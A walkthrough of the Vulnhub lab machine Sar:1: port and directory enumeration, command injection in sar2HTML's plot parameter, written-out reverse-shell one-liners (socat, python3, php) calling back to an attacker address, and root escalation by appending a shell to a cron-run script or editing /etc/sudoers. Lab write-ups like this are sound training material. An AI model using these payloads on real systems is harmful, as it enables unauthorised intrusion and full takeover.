Sar1
Sar:1 Vulnhub Walkthrough
Enumeration
Nmap
nmap -sC -sV -oA nmap/sar1 192.168.43.166
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 22:37 EDT
Nmap scan report for 192.168.1.112
Host is up (0.0033s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:46:0D:BC (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds
1 port open only ! Great!
Dirb
dirb http://192.168.43.166
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed May 13 22:38:52 2020
URL_BASE: http://192.168.1.112/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.112/ ----
+ http://192.168.1.112/index.html (CODE:200|SIZE:10918)
+ http://192.168.1.112/phpinfo.php (CODE:200|SIZE:95475)
+ http://192.168.1.112/robots.txt (CODE:200|SIZE:9)
+ http://192.168.1.112/server-status (CODE:403|SIZE:278)
-----------------
END_TIME: Wed May 13 22:38:57 2020
DOWNLOADED: 4612 - FOUND: 4
Reverse Shell
Let's navigate to robots.txt

replace robots.txt
to sar2HTML
at the URL.
After Googling for awhile, I found sar2HTML exploit at exploit-db.

This means that we can put semicolon after plot
then we can write command at the back of it to access the machine, so guess this is here where we can supply a reverse shell code and get access to the machine.
nc -nv <IP> <Port>
doesn't work so I use socat
to get a reverse shell from it, we also can use python3
to get a reverse shell from it
Socat
Victim's Machine - socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Attacking Machine - socat file:`tty`,raw,echo=0 tcp-listen:4444
Python3
Victim Machine - python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Attacking Machine - nc -nlvp <port>

We got a shell!

Navigate to the love
user directory then we will get the flag for user
Privilege Escalation
After trying some method and I found something at crontab

It seems like there is a file called finally.sh
that will run as superuserdo every 5 minutes
Lets locate the file

After that we cat finally.sh

We can see that inside of the finally.sh will run another file which called write.sh that also have it inside this folder.

We can see that finally.sh is not writable but normal user, but write.sh can

We can add some code inside
Method 1
echo "php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'" >> write.sh
Then, go to the attacking machine and set up a listener by typing
nc -lvp 4444
Wait for 5 minutes and you will get a shell and it is root !

Method 2
echo "www-data NOPASSWD: /bin/bash" >> /etc/sudoers
Wait for 5 minutes then type
sudo -l
and you will see can execute /bin/bash
without password we created earlier
sudo /bin/bash
to get root !

Navigate to /root
to get the flag!

Congratulation!
Last updated
Was this helpful?